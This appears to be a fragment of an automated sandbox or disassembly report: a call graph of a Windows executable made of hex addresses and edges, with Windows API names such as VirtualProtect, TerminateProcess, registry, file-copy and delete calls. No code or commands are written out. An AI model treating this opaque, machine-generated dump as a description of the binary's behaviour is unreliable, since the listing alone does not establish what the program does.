57 API calls 96781->97153 96782 dc7166 96784 d54c6d 22 API calls 96782->96784 96786 dc7175 96784->96786 96785->96754 96787 dc71a9 96786->96787 96789 d54c6d 22 API calls 96786->96789 96788 d5a8c7 22 API calls 96787->96788 96790 dc71ba 96788->96790 96791 dc7186 96789->96791 96792 d56350 22 API calls 96790->96792 96791->96787 96794 d56b57 22 API calls 96791->96794 96793 dc71c8 96792->96793 96795 d56350 22 API calls 96793->96795 96796 dc719b 96794->96796 96798 dc71d6 96795->96798 96797 d56b57 22 API calls 96796->96797 96797->96787 96799 d56350 22 API calls 96798->96799 96800 dc71e4 96799->96800 96801 d57510 53 API calls 96800->96801 96802 dc71f0 96801->96802 97042 dbd7bc 96802->97042 96804 dc7201 96805 dbd4ce 4 API calls 96804->96805 96806 dc720b 96805->96806 96807 d57510 53 API calls 96806->96807 96811 dc7239 96806->96811 96808 dc7229 96807->96808 97096 dc2947 96808->97096 96810 d54f39 68 API calls 96810->96754 96811->96810 96813 d57510 53 API calls 96812->96813 96814 dcf126 96813->96814 97163 d59e90 96814->97163 96816 dcf136 96817 dcf15b 96816->96817 96818 d5ec40 235 API calls 96816->96818 96820 dcf15f 96817->96820 97191 d59c6e 22 API calls 96817->97191 96818->96817 96820->96703 97207 dbdbbe lstrlenW 96821->97207 96825 dd7f59 120 API calls 96824->96825 96826 dd959b 96825->96826 96826->96703 96848 d5ec76 messages 96827->96848 96828 d700a3 29 API calls pre_c_initialization 96828->96848 96829 d6fddb 22 API calls 96829->96848 96830 d5fef7 96836 d5a8c7 22 API calls 96830->96836 96844 d5ed9d messages 96830->96844 96833 da4600 96839 d5a8c7 22 API calls 96833->96839 96833->96844 96834 da4b0b 97215 dc359c 82 API calls __wsopen_s 96834->97215 96835 d5a8c7 22 API calls 96835->96848 96836->96844 96839->96844 96841 d70242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96841->96848 96842 d5fbe3 96842->96844 96845 da4bdc 96842->96845 96850 d5f3ae messages 96842->96850 96843 d5a961 22 API calls 96843->96848 96844->96679 97216 dc359c 82 API calls __wsopen_s 96845->97216 96847 da4beb 97217 dc359c 82 API calls __wsopen_s 96847->97217 96848->96828 96848->96829 96848->96830 96848->96833 96848->96834 96848->96835 96848->96841 96848->96842 96848->96843 96848->96844 96848->96847 96849 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96848->96849 96848->96850 97212 d601e0 235 API calls 2 library calls 96848->97212 97213 d606a0 41 API calls messages 96848->97213 96849->96848 96850->96844 97214 dc359c 82 API calls __wsopen_s 96850->97214 96851->96702 96852->96664 96853->96667 96854->96677 96855->96683 96856->96683 96857->96665 96858->96703 96859->96703 96860->96703 96861->96700 96862->96703 96863->96724 96864->96723 96865->96725 96866->96728 96905 d57510 96867->96905 96871 dd8281 96872 dd844f 96871->96872 96877 dd828f 96871->96877 96969 dd8ee4 60 API calls 96872->96969 96875 dd845e 96876 dd846a 96875->96876 96875->96877 96884 dd7fd5 messages 96876->96884 96941 dd7e86 96877->96941 96878 d57510 53 API calls 96889 dd8049 96878->96889 96883 dd82c8 96956 d6fc70 96883->96956 96884->96731 96887 dd82e8 96962 dc359c 82 API calls __wsopen_s 96887->96962 96888 dd8302 96963 d563eb 22 API calls 96888->96963 96889->96871 96889->96878 96889->96884 96960 db417d 22 API calls __fread_nolock 96889->96960 96961 dd851d 42 API calls _strftime 96889->96961 96892 dd82f3 GetCurrentProcess TerminateProcess 96892->96888 96893 dd8311 96964 d56a50 22 API calls 96893->96964 96895 dd832a 96903 dd8352 96895->96903 96965 d604f0 22 API calls 96895->96965 96897 dd84c5 96897->96884 96901 dd84d9 FreeLibrary 96897->96901 96898 dd8341 96966 dd8b7b 75 API calls 96898->96966 96901->96884 96903->96897 96967 d604f0 22 API calls 96903->96967 96968 d5aceb 23 API calls messages 96903->96968 96970 dd8b7b 75 API calls 96903->96970 96906 d57525 96905->96906 96923 d57522 96905->96923 96907 d5752d 96906->96907 96908 d5755b 96906->96908 96971 d751c6 26 API calls 96907->96971 96910 d950f6 96908->96910 96913 d5756d 96908->96913 96918 d9500f 96908->96918 96974 d75183 26 API calls 96910->96974 96911 d5753d 96917 d6fddb 22 API calls 96911->96917 96972 d6fb21 51 API calls 96913->96972 96914 d9510e 96914->96914 96919 d57547 96917->96919 96920 d95088 96918->96920 96922 d6fe0b 22 API calls 96918->96922 96921 d59cb3 22 API calls 96919->96921 96973 d6fb21 51 API calls 96920->96973 96921->96923 96924 d95058 96922->96924 96923->96884 96928 dd8cd3 96923->96928 96925 d6fddb 22 API calls 96924->96925 96926 d9507f 96925->96926 96927 d59cb3 22 API calls 96926->96927 96927->96920 96929 d5aec9 22 API calls 96928->96929 96930 dd8cee CharLowerBuffW 96929->96930 96975 db8e54 96930->96975 96934 d5a961 22 API calls 96935 dd8d2a 96934->96935 96982 d56d25 96935->96982 96937 dd8d3e 96938 d593b2 22 API calls 96937->96938 96940 dd8d48 _wcslen 96938->96940 96939 dd8e5e _wcslen 96939->96889 96940->96939 96995 dd851d 42 API calls _strftime 96940->96995 96942 dd7ea1 96941->96942 96946 dd7eec 96941->96946 96943 d6fe0b 22 API calls 96942->96943 96944 dd7ec3 96943->96944 96945 d6fddb 22 API calls 96944->96945 96944->96946 96945->96944 96947 dd9096 96946->96947 96948 dd92ab messages 96947->96948 96954 dd90ba _strcat _wcslen 96947->96954 96948->96883 96949 d5b567 39 API calls 96949->96954 96950 d5b6b5 39 API calls 96950->96954 96951 d5b38f 39 API calls 96951->96954 96952 d57510 53 API calls 96952->96954 96953 d7ea0c 21 API calls ___std_exception_copy 96953->96954 96954->96948 96954->96949 96954->96950 96954->96951 96954->96952 96954->96953 96999 dbefae 24 API calls _wcslen 96954->96999 96958 d6fc85 96956->96958 96957 d6fd1d VirtualProtect 96959 d6fceb 96957->96959 96958->96957 96958->96959 96959->96887 96959->96888 96960->96889 96961->96889 96962->96892 96963->96893 96964->96895 96965->96898 96966->96903 96967->96903 96968->96903 96969->96875 96970->96903 96971->96911 96972->96911 96973->96910 96974->96914 96976 db8e74 _wcslen 96975->96976 96977 db8f63 96976->96977 96979 db8ea9 96976->96979 96981 db8f68 96976->96981 96977->96934 96977->96940 96979->96977 96996 d6ce60 41 API calls 96979->96996 96981->96977 96997 d6ce60 41 API calls 96981->96997 96983 d56d34 96982->96983 96984 d56d91 96982->96984 96983->96984 96986 d56d3f 96983->96986 96985 d593b2 22 API calls 96984->96985 96992 d56d62 __fread_nolock 96985->96992 96987 d94c9d 96986->96987 96988 d56d5a 96986->96988 96989 d6fddb 22 API calls 96987->96989 96998 d56f34 22 API calls 96988->96998 96991 d94ca7 96989->96991 96993 d6fe0b 22 API calls 96991->96993 96992->96937 96994 d94cda 96993->96994 96995->96939 96996->96979 96997->96981 96998->96992 96999->96954 97001 d5a961 22 API calls 97000->97001 97002 d55275 97001->97002 97003 d5a961 22 API calls 97002->97003 97004 d5527d 97003->97004 97005 d5a961 22 API calls 97004->97005 97006 d55285 97005->97006 97007 d5a961 22 API calls 97006->97007 97008 d5528d 97007->97008 97009 d552c1 97008->97009 97010 d93df5 97008->97010 97011 d56d25 22 API calls 97009->97011 97012 d5a8c7 22 API calls 97010->97012 97013 d552cf 97011->97013 97014 d93dfe 97012->97014 97015 d593b2 22 API calls 97013->97015 97016 d5a6c3 22 API calls 97014->97016 97017 d552d9 97015->97017 97018 d55304 97016->97018 97017->97018 97019 d56d25 22 API calls 97017->97019 97020 d55349 97018->97020 97021 d55325 97018->97021 97030 d93e20 97018->97030 97023 d552fa 97019->97023 97022 d56d25 22 API calls 97020->97022 97021->97020 97026 d54c6d 22 API calls 97021->97026 97024 d5535a 97022->97024 97025 d593b2 22 API calls 97023->97025 97027 d55370 97024->97027 97033 d5a8c7 22 API calls 97024->97033 97025->97018 97028 d55332 97026->97028 97031 d55384 97027->97031 97035 d5a8c7 22 API calls 97027->97035 97028->97020 97034 d56d25 22 API calls 97028->97034 97029 d56b57 22 API calls 97037 d93ee0 97029->97037 97030->97029 97032 d5538f 97031->97032 97036 d5a8c7 22 API calls 97031->97036 97038 d5a8c7 22 API calls 97032->97038 97040 d5539a 97032->97040 97033->97027 97034->97020 97035->97031 97036->97032 97037->97020 97039 d54c6d 22 API calls 97037->97039 97154 d549bd 22 API calls __fread_nolock 97037->97154 97038->97040 97039->97037 97040->96782 97043 dbd7d8 97042->97043 97044 dbd7dd 97043->97044 97045 dbd7f3 97043->97045 97047 dbd7ee 97044->97047 97049 d5a8c7 22 API calls 97044->97049 97046 d5a961 22 API calls 97045->97046 97048 dbd7fb 97046->97048 97047->96804 97050 d5a961 22 API calls 97048->97050 97049->97047 97051 dbd803 97050->97051 97052 d5a961 22 API calls 97051->97052 97053 dbd80e 97052->97053 97054 d5a961 22 API calls 97053->97054 97055 dbd816 97054->97055 97056 d5a961 22 API calls 97055->97056 97057 dbd81e 97056->97057 97058 d5a961 22 API calls 97057->97058 97059 dbd826 97058->97059 97060 d5a961 22 API calls 97059->97060 97061 dbd82e 97060->97061 97062 d5a961 22 API calls 97061->97062 97063 dbd836 97062->97063 97064 d5525f 22 API calls 97063->97064 97065 dbd84d 97064->97065 97066 d5525f 22 API calls 97065->97066 97067 dbd866 97066->97067 97068 d54c6d 22 API calls 97067->97068 97069 dbd872 97068->97069 97070 dbd885 97069->97070 97071 d593b2 22 API calls 97069->97071 97072 d54c6d 22 API calls 97070->97072 97071->97070 97073 dbd88e 97072->97073 97074 dbd89e 97073->97074 97076 d593b2 22 API calls 97073->97076 97075 dbd8b0 97074->97075 97077 d5a8c7 22 API calls 97074->97077 97078 d56350 22 API calls 97075->97078 97076->97074 97077->97075 97079 dbd8bb 97078->97079 97155 dbd978 22 API calls 97079->97155 97081 dbd8ca 97156 dbd978 22 API calls 97081->97156 97083 dbd8dd 97084 d54c6d 22 API calls 97083->97084 97085 dbd8e7 97084->97085 97086 dbd8fe 97085->97086 97087 dbd8ec 97085->97087 97089 d54c6d 22 API calls 97086->97089 97088 d533c6 22 API calls 97087->97088 97091 dbd8f9 97088->97091 97090 dbd907 97089->97090 97092 dbd925 97090->97092 97093 d533c6 22 API calls 97090->97093 97094 d56350 22 API calls 97091->97094 97095 d56350 22 API calls 97092->97095 97093->97091 97094->97092 97095->97047 97097 dc2954 __wsopen_s 97096->97097 97098 d6fe0b 22 API calls 97097->97098 97099 dc2971 97098->97099 97100 d55722 22 API calls 97099->97100 97101 dc297b 97100->97101 97102 dc274e 27 API calls 97101->97102 97103 dc2986 97102->97103 97104 d5511f 64 API calls 97103->97104 97105 dc299b 97104->97105 97106 dc2a6c 97105->97106 97107 dc29bf 97105->97107 97108 dc2e66 75 API calls 97106->97108 97109 dc2e66 75 API calls 97107->97109 97124 dc2a38 97108->97124 97110 dc29c4 97109->97110 97116 dc2a75 messages 97110->97116 97161 d7d583 26 API calls 97110->97161 97112 d550f5 40 API calls 97113 dc2a91 97112->97113 97114 d550f5 40 API calls 97113->97114 97115 dc2aa1 97114->97115 97118 d550f5 40 API calls 97115->97118 97116->96811 97117 dc29ed 97162 d7d583 26 API calls 97117->97162 97120 dc2abc 97118->97120 97121 d550f5 40 API calls 97120->97121 97122 dc2acc 97121->97122 97123 d550f5 40 API calls 97122->97123 97125 dc2ae7 97123->97125 97124->97112 97124->97116 97126 d550f5 40 API calls 97125->97126 97127 dc2af7 97126->97127 97128 d550f5 40 API calls 97127->97128 97129 dc2b07 97128->97129 97130 d550f5 40 API calls 97129->97130 97131 dc2b17 97130->97131 97157 dc3017 GetTempPathW GetTempFileNameW 97131->97157 97133 dc2b22 97134 d7e5eb 29 API calls 97133->97134 97136 dc2b33 97134->97136 97135 d7e678 67 API calls 97137 dc2bf8 97135->97137 97136->97116 97138 d550f5 40 API calls 97136->97138 97145 d7dbb3 65 API calls 97136->97145 97147 dc2bed 97136->97147 97139 dc2bfe DeleteFileW 97137->97139 97140 dc2c12 97137->97140 97138->97136 97139->97116 97141 dc2c91 CopyFileW 97140->97141 97146 dc2c18 97140->97146 97142 dc2cb9 DeleteFileW 97141->97142 97143 dc2ca7 DeleteFileW 97141->97143 97158 dc2fd8 CreateFileW 97142->97158 97143->97116 97145->97136 97148 dc22ce 79 API calls 97146->97148 97147->97135 97149 dc2c7c 97148->97149 97149->97142 97150 dc2c80 DeleteFileW 97149->97150 97150->97116 97151->96737 97152->96771 97153->96785 97154->97037 97155->97081 97156->97083 97157->97133 97159 dc2fff SetFileTime CloseHandle 97158->97159 97160 dc3013 97158->97160 97159->97160 97160->97116 97161->97117 97162->97124 97164 d56270 22 API calls 97163->97164 97181 d59eb5 97164->97181 97165 d59fd2 97193 d5a4a1 97165->97193 97167 d59fec 97167->96816 97170 d9f7c4 97205 db96e2 84 API calls __wsopen_s 97170->97205 97171 d9f699 97177 d6fddb 22 API calls 97171->97177 97173 d5a405 97173->97167 97206 db96e2 84 API calls __wsopen_s 97173->97206 97175 d5a6c3 22 API calls 97175->97181 97179 d9f754 97177->97179 97178 d9f7d2 97180 d5a4a1 22 API calls 97178->97180 97183 d6fe0b 22 API calls 97179->97183 97182 d9f7e8 97180->97182 97181->97165 97181->97170 97181->97171 97181->97173 97181->97175 97185 d5a587 22 API calls 97181->97185 97186 d5aec9 22 API calls 97181->97186 97187 d5a4a1 22 API calls 97181->97187 97188 d5a12c __fread_nolock 97181->97188 97192 d54573 41 API calls _wcslen 97181->97192 97202 d548c8 23 API calls 97181->97202 97203 d549bd 22 API calls __fread_nolock 97181->97203 97204 d5a673 22 API calls 97181->97204 97182->97167 97183->97188 97185->97181 97189 d5a0db CharUpperBuffW 97186->97189 97187->97181 97188->97170 97188->97173 97201 d5a673 22 API calls 97189->97201 97191->96820 97192->97181 97194 d5a52b 97193->97194 97199 d5a4b1 __fread_nolock 97193->97199 97196 d6fe0b 22 API calls 97194->97196 97195 d6fddb 22 API calls 97197 d5a4b8 97195->97197 97196->97199 97198 d6fddb 22 API calls 97197->97198 97200 d5a4d6 97197->97200 97198->97200 97199->97195 97200->97167 97201->97181 97202->97181 97203->97181 97204->97181 97205->97178 97206->97167 97208 dbdbdc GetFileAttributesW 97207->97208 97209 dbd4d5 97207->97209 97208->97209 97210 dbdbe8 FindFirstFileW 97208->97210 97209->96703 97210->97209 97211 dbdbf9 FindClose 97210->97211 97211->97209 97212->96848 97213->96848 97214->96844 97215->96844 97216->96847 97217->96844 97218 d703fb 97219 d70407 CallCatchBlock 97218->97219 97247 d6feb1 97219->97247 97221 d7040e 97222 d70561 97221->97222 97225 d70438 97221->97225 97274 d7083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97222->97274 97224 d70568 97275 d74e52 28 API calls _abort 97224->97275 97236 d70477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97225->97236 97258 d8247d 97225->97258 97227 d7056e 97276 d74e04 28 API calls _abort 97227->97276 97231 d70576 97232 d70457 97235 d704de 97239 d704f3 97235->97239 97238 d704d8 97236->97238 97270 d74e1a 38 API calls 3 library calls 97236->97270 97266 d70959 97238->97266 97271 d70992 GetModuleHandleW 97239->97271 97241 d704fa 97241->97224 97242 d704fe 97241->97242 97243 d70507 97242->97243 97272 d74df5 28 API calls _abort 97242->97272 97273 d70040 13 API calls 2 library calls 97243->97273 97246 d7050f 97246->97232 97248 d6feba 97247->97248 97277 d70698 IsProcessorFeaturePresent 97248->97277 97250 d6fec6 97278 d72c94 10 API calls 3 library calls 97250->97278 97252 d6fecb 97253 d6fecf 97252->97253 97279 d82317 97252->97279 97253->97221 97256 d6fee6 97256->97221 97259 d82494 97258->97259 97260 d70a8c _ValidateLocalCookies 5 API calls 97259->97260 97261 d70451 97260->97261 97261->97232 97262 d82421 97261->97262 97265 d82450 97262->97265 97263 d70a8c _ValidateLocalCookies 5 API calls 97264 d82479 97263->97264 97264->97236 97265->97263 97330 d72340 97266->97330 97268 d7096c GetStartupInfoW 97269 d7097f 97268->97269 97269->97235 97270->97238 97271->97241 97272->97243 97273->97246 97274->97224 97275->97227 97276->97231 97277->97250 97278->97252 97283 d8d1f6 97279->97283 97282 d72cbd 8 API calls 3 library calls 97282->97253 97286 d8d213 97283->97286 97287 d8d20f 97283->97287 97284 d70a8c _ValidateLocalCookies 5 API calls 97285 d6fed8 97284->97285 97285->97256 97285->97282 97286->97287 97289 d84bfb 97286->97289 97287->97284 97290 d84c07 CallCatchBlock 97289->97290 97301 d82f5e EnterCriticalSection 97290->97301 97292 d84c0e 97302 d850af 97292->97302 97294 d84c1d 97300 d84c2c 97294->97300 97315 d84a8f 29 API calls 97294->97315 97297 d84c27 97316 d84b45 GetStdHandle GetFileType 97297->97316 97298 d84c3d __wsopen_s 97298->97286 97317 d84c48 LeaveCriticalSection _abort 97300->97317 97301->97292 97303 d850bb CallCatchBlock 97302->97303 97304 d850c8 97303->97304 97305 d850df 97303->97305 97326 d7f2d9 20 API calls __dosmaperr 97304->97326 97318 d82f5e EnterCriticalSection 97305->97318 97308 d850cd 97327 d827ec 26 API calls __wsopen_s 97308->97327 97310 d850d7 __wsopen_s 97310->97294 97312 d850eb 97314 d85117 97312->97314 97319 d85000 97312->97319 97328 d8513e LeaveCriticalSection _abort 97314->97328 97315->97297 97316->97300 97317->97298 97318->97312 97320 d84c7d __dosmaperr 20 API calls 97319->97320 97321 d85012 97320->97321 97325 d8501f 97321->97325 97329 d83405 11 API calls 2 library calls 97321->97329 97322 d829c8 _free 20 API calls 97323 d85071 97322->97323 97323->97312 97325->97322 97326->97308 97327->97310 97328->97310 97329->97321 97331 d72357 97330->97331 97331->97268 97331->97331 97332 d51098 97337 d542de 97332->97337 97336 d510a7 97338 d5a961 22 API calls 97337->97338 97339 d542f5 GetVersionExW 97338->97339 97340 d56b57 22 API calls 97339->97340 97341 d54342 97340->97341 97342 d593b2 22 API calls 97341->97342 97353 d54378 97341->97353 97343 d5436c 97342->97343 97345 d537a0 22 API calls 97343->97345 97344 d5441b GetCurrentProcess IsWow64Process 97346 d54437 97344->97346 97345->97353 97347 d5444f LoadLibraryA 97346->97347 97348 d93824 GetSystemInfo 97346->97348 97349 d54460 GetProcAddress 97347->97349 97350 d5449c GetSystemInfo 97347->97350 97349->97350 97351 d54470 GetNativeSystemInfo 97349->97351 97352 d54476 97350->97352 97351->97352 97355 d5109d 97352->97355 97356 d5447a FreeLibrary 97352->97356 97353->97344 97354 d937df 97353->97354 97357 d700a3 29 API calls __onexit 97355->97357 97356->97355 97357->97336 97358 d5105b 97363 d5344d 97358->97363 97360 d5106a 97394 d700a3 29 API calls __onexit 97360->97394 97362 d51074 97364 d5345d __wsopen_s 97363->97364 97365 d5a961 22 API calls 97364->97365 97366 d53513 97365->97366 97367 d53a5a 24 API calls 97366->97367 97368 d5351c 97367->97368 97395 d53357 97368->97395 97371 d533c6 22 API calls 97372 d53535 97371->97372 97373 d5515f 22 API calls 97372->97373 97374 d53544 97373->97374 97375 d5a961 22 API calls 97374->97375 97376 d5354d 97375->97376 97377 d5a6c3 22 API calls 97376->97377 97378 d53556 RegOpenKeyExW 97377->97378 97379 d53578 97378->97379 97380 d93176 RegQueryValueExW 97378->97380 97379->97360 97381 d9320c RegCloseKey 97380->97381 97382 d93193 97380->97382 97381->97379 97393 d9321e _wcslen 97381->97393 97383 d6fe0b 22 API calls 97382->97383 97384 d931ac 97383->97384 97385 d55722 22 API calls 97384->97385 97386 d931b7 RegQueryValueExW 97385->97386 97387 d931d4 97386->97387 97390 d931ee messages 97386->97390 97388 d56b57 22 API calls 97387->97388 97388->97390 97389 d54c6d 22 API calls 97389->97393 97390->97381 97391 d59cb3 22 API calls 97391->97393 97392 d5515f 22 API calls 97392->97393 97393->97379 97393->97389 97393->97391 97393->97392 97394->97362 97396 d91f50 __wsopen_s 97395->97396 97397 d53364 GetFullPathNameW 97396->97397 97398 d53386 97397->97398 97399 d56b57 22 API calls 97398->97399 97400 d533a4 97399->97400 97400->97371 97401 da3f75 97412 d6ceb1 97401->97412 97403 da3f8b 97411 da4006 97403->97411 97479 d6e300 23 API calls 97403->97479 97406 da4052 97409 da4a88 97406->97409 97481 dc359c 82 API calls __wsopen_s 97406->97481 97408 da3fe6 97408->97406 97480 dc1abf 22 API calls 97408->97480 97421 d5bf40 97411->97421 97413 d6ced2 97412->97413 97414 d6cebf 97412->97414 97416 d6ced7 97413->97416 97417 d6cf05 97413->97417 97482 d5aceb 23 API calls messages 97414->97482 97418 d6fddb 22 API calls 97416->97418 97483 d5aceb 23 API calls messages 97417->97483 97420 d6cec9 97418->97420 97420->97403 97484 d5adf0 97421->97484 97423 d5bf9d 97424 da04b6 97423->97424 97425 d5bfa9 97423->97425 97503 dc359c 82 API calls __wsopen_s 97424->97503 97427 da04c6 97425->97427 97428 d5c01e 97425->97428 97504 dc359c 82 API calls __wsopen_s 97427->97504 97489 d5ac91 97428->97489 97432 d5c7da 97436 d6fe0b 22 API calls 97432->97436 97433 db7120 22 API calls 97476 d5c039 __fread_nolock messages 97433->97476 97441 d5c808 __fread_nolock 97436->97441 97438 da04f5 97442 da055a 97438->97442 97505 d6d217 235 API calls 97438->97505 97444 d6fe0b 22 API calls 97441->97444 97463 d5c603 97442->97463 97506 dc359c 82 API calls __wsopen_s 97442->97506 97443 d5ec40 235 API calls 97443->97476 97475 d5c350 __fread_nolock messages 97444->97475 97445 d5af8a 22 API calls 97445->97476 97446 da091a 97516 dc3209 23 API calls 97446->97516 97449 da08a5 97450 d5ec40 235 API calls 97449->97450 97451 da08cf 97450->97451 97451->97463 97514 d5a81b 41 API calls 97451->97514 97453 da0591 97507 dc359c 82 API calls __wsopen_s 97453->97507 97457 da08f6 97515 dc359c 82 API calls __wsopen_s 97457->97515 97460 d5c237 97461 d5c253 97460->97461 97462 d5a8c7 22 API calls 97460->97462 97464 da0976 97461->97464 97469 d5c297 messages 97461->97469 97462->97461 97463->97406 97517 d5aceb 23 API calls messages 97464->97517 97465 d6fddb 22 API calls 97465->97476 97468 da09bf 97468->97463 97518 dc359c 82 API calls __wsopen_s 97468->97518 97469->97468 97500 d5aceb 23 API calls messages 97469->97500 97471 d5c335 97471->97468 97473 d5c342 97471->97473 97472 d5bbe0 40 API calls 97472->97476 97501 d5a704 22 API calls messages 97473->97501 97478 d5c3ac 97475->97478 97502 d6ce17 22 API calls messages 97475->97502 97476->97432 97476->97433 97476->97438 97476->97441 97476->97442 97476->97443 97476->97445 97476->97446 97476->97449 97476->97453 97476->97457 97476->97460 97476->97463 97476->97465 97476->97468 97476->97472 97477 d6fe0b 22 API calls 97476->97477 97493 d5ad81 97476->97493 97508 db7099 22 API calls __fread_nolock 97476->97508 97509 dd5745 54 API calls _wcslen 97476->97509 97510 d6aa42 22 API calls messages 97476->97510 97511 dbf05c 40 API calls 97476->97511 97512 d5a993 41 API calls 97476->97512 97513 d5aceb 23 API calls messages 97476->97513 97477->97476 97478->97406 97479->97408 97480->97411 97481->97409 97482->97420 97483->97420 97485 d5ae01 97484->97485 97488 d5ae1c messages 97484->97488 97486 d5aec9 22 API calls 97485->97486 97487 d5ae09 CharUpperBuffW 97486->97487 97487->97488 97488->97423 97490 d5acae 97489->97490 97492 d5acd1 97490->97492 97519 dc359c 82 API calls __wsopen_s 97490->97519 97492->97476 97494 d9fadb 97493->97494 97495 d5ad92 97493->97495 97496 d6fddb 22 API calls 97495->97496 97497 d5ad99 97496->97497 97520 d5adcd 97497->97520 97500->97471 97501->97475 97502->97475 97503->97427 97504->97463 97505->97442 97506->97463 97507->97463 97508->97476 97509->97476 97510->97476 97511->97476 97512->97476 97513->97476 97514->97457 97515->97463 97516->97460 97517->97468 97518->97463 97519->97492 97523 d5addd 97520->97523 97521 d5adb6 97521->97476 97522 d6fddb 22 API calls 97522->97523 97523->97521 97523->97522 97524 d5a961 22 API calls 97523->97524 97525 d5a8c7 22 API calls 97523->97525 97526 d5adcd 22 API calls 97523->97526 97524->97523 97525->97523 97526->97523 97527 d51044 97532 d510f3 97527->97532 97529 d5104a 97568 d700a3 29 API calls __onexit 97529->97568 97531 d51054 97569 d51398 97532->97569 97536 d5116a 97537 d5a961 22 API calls 97536->97537 97538 d51174 97537->97538 97539 d5a961 22 API calls 97538->97539 97540 d5117e 97539->97540 97541 d5a961 22 API calls 97540->97541 97542 d51188 97541->97542 97543 d5a961 22 API calls 97542->97543 97544 d511c6 97543->97544 97545 d5a961 22 API calls 97544->97545 97546 d51292 97545->97546 97579 d5171c 97546->97579 97550 d512c4 97551 d5a961 22 API calls 97550->97551 97552 d512ce 97551->97552 97553 d61940 9 API calls 97552->97553 97554 d512f9 97553->97554 97600 d51aab 97554->97600 97556 d51315 97557 d51325 GetStdHandle 97556->97557 97558 d92485 97557->97558 97559 d5137a 97557->97559 97558->97559 97560 d9248e 97558->97560 97563 d51387 OleInitialize 97559->97563 97561 d6fddb 22 API calls 97560->97561 97562 d92495 97561->97562 97607 dc011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97562->97607 97563->97529 97565 d9249e 97608 dc0944 CreateThread 97565->97608 97567 d924aa CloseHandle 97567->97559 97568->97531 97609 d513f1 97569->97609 97572 d513f1 22 API calls 97573 d513d0 97572->97573 97574 d5a961 22 API calls 97573->97574 97575 d513dc 97574->97575 97576 d56b57 22 API calls 97575->97576 97577 d51129 97576->97577 97578 d51bc3 6 API calls 97577->97578 97578->97536 97580 d5a961 22 API calls 97579->97580 97581 d5172c 97580->97581 97582 d5a961 22 API calls 97581->97582 97583 d51734 97582->97583 97584 d5a961 22 API calls 97583->97584 97585 d5174f 97584->97585 97586 d6fddb 22 API calls 97585->97586 97587 d5129c 97586->97587 97588 d51b4a 97587->97588 97589 d51b58 97588->97589 97590 d5a961 22 API calls 97589->97590 97591 d51b63 97590->97591 97592 d5a961 22 API calls 97591->97592 97593 d51b6e 97592->97593 97594 d5a961 22 API calls 97593->97594 97595 d51b79 97594->97595 97596 d5a961 22 API calls 97595->97596 97597 d51b84 97596->97597 97598 d6fddb 22 API calls 97597->97598 97599 d51b96 RegisterWindowMessageW 97598->97599 97599->97550 97601 d9272d 97600->97601 97602 d51abb 97600->97602 97616 dc3209 23 API calls 97601->97616 97603 d6fddb 22 API calls 97602->97603 97606 d51ac3 97603->97606 97605 d92738 97606->97556 97607->97565 97608->97567 97617 dc092a 28 API calls 97608->97617 97610 d5a961 22 API calls 97609->97610 97611 d513fc 97610->97611 97612 d5a961 22 API calls 97611->97612 97613 d51404 97612->97613 97614 d5a961 22 API calls 97613->97614 97615 d513c6 97614->97615 97615->97572 97616->97605 97618 d52de3 97619 d52df0 __wsopen_s 97618->97619 97620 d92c2b ___scrt_fastfail 97619->97620 97621 d52e09 97619->97621 97624 d92c47 GetOpenFileNameW 97620->97624 97622 d53aa2 23 API calls 97621->97622 97623 d52e12 97622->97623 97634 d52da5 97623->97634 97626 d92c96 97624->97626 97627 d56b57 22 API calls 97626->97627 97629 d92cab 97627->97629 97629->97629 97631 d52e27 97652 d544a8 97631->97652 97635 d91f50 __wsopen_s 97634->97635 97636 d52db2 GetLongPathNameW 97635->97636 97637 d56b57 22 API calls 97636->97637 97638 d52dda 97637->97638 97639 d53598 97638->97639 97640 d5a961 22 API calls 97639->97640 97641 d535aa 97640->97641 97642 d53aa2 23 API calls 97641->97642 97643 d535b5 97642->97643 97644 d932eb 97643->97644 97645 d535c0 97643->97645 97650 d9330d 97644->97650 97688 d6ce60 41 API calls 97644->97688 97646 d5515f 22 API calls 97645->97646 97648 d535cc 97646->97648 97682 d535f3 97648->97682 97651 d535df 97651->97631 97653 d54ecb 94 API calls 97652->97653 97654 d544cd 97653->97654 97655 d93833 97654->97655 97656 d54ecb 94 API calls 97654->97656 97657 dc2cf9 80 API calls 97655->97657 97658 d544e1 97656->97658 97659 d93848 97657->97659 97658->97655 97660 d544e9 97658->97660 97661 d93869 97659->97661 97662 d9384c 97659->97662 97664 d544f5 97660->97664 97665 d93854 97660->97665 97663 d6fe0b 22 API calls 97661->97663 97666 d54f39 68 API calls 97662->97666 97681 d938ae 97663->97681 97695 d5940c 136 API calls 2 library calls 97664->97695 97696 dbda5a 82 API calls 97665->97696 97666->97665 97669 d52e31 97670 d93862 97670->97661 97671 d93a5f 97676 d93a67 97671->97676 97672 d54f39 68 API calls 97672->97676 97673 d5a4a1 22 API calls 97673->97681 97676->97672 97700 db989b 82 API calls __wsopen_s 97676->97700 97678 d59cb3 22 API calls 97678->97681 97681->97671 97681->97673 97681->97676 97681->97678 97689 d53ff7 97681->97689 97697 db967e 22 API calls __fread_nolock 97681->97697 97698 db95ad 42 API calls _wcslen 97681->97698 97699 dc0b5a 22 API calls 97681->97699 97683 d53605 97682->97683 97687 d53624 __fread_nolock 97682->97687 97685 d6fe0b 22 API calls 97683->97685 97684 d6fddb 22 API calls 97686 d5363b 97684->97686 97685->97687 97686->97651 97687->97684 97688->97644 97690 d5400a 97689->97690 97692 d540ae 97689->97692 97691 d6fe0b 22 API calls 97690->97691 97693 d5403c 97690->97693 97691->97693 97692->97681 97693->97692 97694 d6fddb 22 API calls 97693->97694 97694->97693 97695->97669 97696->97670 97697->97681 97698->97681 97699->97681 97700->97676 97701 d51cad SystemParametersInfoW 97702 da2a00 97716 d5d7b0 messages 97702->97716 97703 d5db11 PeekMessageW 97703->97716 97704 d5d807 GetInputState 97704->97703 97704->97716 97706 da1cbe TranslateAcceleratorW 97706->97716 97707 d5da04 timeGetTime 97707->97716 97708 d5db73 TranslateMessage DispatchMessageW 97709 d5db8f PeekMessageW 97708->97709 97709->97716 97710 d5dbaf Sleep 97727 d5dbc0 97710->97727 97711 da2b74 Sleep 